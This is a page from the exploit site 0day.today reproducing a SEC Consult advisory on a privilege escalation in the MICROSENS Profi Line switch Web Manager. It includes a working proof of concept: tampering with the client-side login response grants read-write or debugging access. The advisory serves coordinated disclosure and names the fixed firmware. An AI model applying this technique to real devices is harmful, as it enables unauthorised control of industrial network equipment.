0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation
title: Privilege escalation vulnerability product: MICROSENS Profi Line Modular Industrial Switch Web Manager (MS652119PM) vulnerable version: Firmware version 10.3.1 fixed version: Firmware version 10.3.2 impact: High homepage: http://www.microsens.com/profi-line-modular/ found: 2013-08-21 by: Christian Kudera, Stefan Riegler SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "The new Profi Line Modular switches, from MICROSENS, offer maximum performance and flexibility in smallest spaces. Robust, modular, expandable and designed for greatest reliability and shortest recovery times, the Profi Line Modular series has become the first-choice solution for Industrial Ethernet." Source: http://www.microsens.com/profi-line-modular/ Business recommendation: ------------------------ SEC Consult has identified a privilege escalation in the MICROSENS Web Manager in the course of a very limited infrastructure audit. Very little time was spent on the affected product. The Web Manager can be used with read only permission to check the configuration on the device (e.g. VLANs, Port status). Additionally the Web Manager can be used with read and write permission to configure the device. Using the identified vulnerability a low privileged user having read only permission can elevate his privileges to contain read and write permissions. Vulnerability overview/description: ----------------------------------- The Web Manager contains a login form to authenticate a user. The Web Manager offers different levels of privilege (e.g. read only permission, read and write permission, debugging permission). The login attempt is checked through a CGI binary, but the response of the binary is validated at the client side via JavaScript. An attacker can intercept and modify the response of the binary, thus achieving authentication and the desired level of authorization. No further validation is performed by the Web Manager. Proof of concept: ----------------- The login generates the following request to the server: interf=WEB&bidx=1&unam=root&pawo=&plev=0 This request triggers a CGI binary, which validates the login attempt and returns the following response: <xml> <!-- last change: 17.04.2012 --> <!-- returned at uptime of 141056 seconds --> <header> <version>V0.1</version> <user>XYZ</user> <date>2012/05/29 17:28:00</date> </header> <response> <par name="cmd" type="STRING" > <val>login</val> </par> <par name="result" type="UNSIGNED" > <val>255</val> </par> <par name="lunam" type="STRING" > <val>root</val> </par> <par name="liid" type="STRING" > <val>0</val> </par> <par name="rhost" type="STRING" > <val>192.10.100.136</val> </par> <par name="a_s_b" type="STRING" > <val>0_0_1</val> </par> </response> </xml> The parameter "result" informs the client about the properness of the provided login credentials. The parameter can correspond to the following values: 255 login failed 1 login with read only permission 2 login with read and write permission 3 login with debugging permission For example, if the value of the parameter "result" is changed to 3, the user gets logged in with debugging permissions. Vendor contact timeline: ------------------------ 2013-09-10: Contacting vendor 2013-09-11: Sending advisory and proof of concept exploit via encrypted channel. 2013-09-11: Vendor acknowledges receipt of advisory. 2013-10-18: Vendor responds and wants to release update on 2013-10-31. 2013-10-31: MICROSENS releases fixed version. 2014-02-07: Conference call: Clarifying pending questions regarding the fixed version. 2014-02-28: SEC Consult releases coordinated security advisory. Solution: --------- Update to the most recent firmware version 10.3.2 # 0day.today [2024-12-24] #